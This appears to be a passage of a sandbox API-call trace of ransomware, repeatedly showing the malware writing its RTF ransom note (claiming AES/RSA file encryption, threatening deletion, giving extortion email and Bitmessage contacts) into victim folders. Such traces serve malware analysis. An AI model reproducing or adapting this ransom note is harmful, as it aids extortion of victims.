th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.158] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.159] CloseHandle (hObject=0x2ec) returned 1 [0291.159] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0291.159] GetLastError () returned 0x2 [0291.159] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 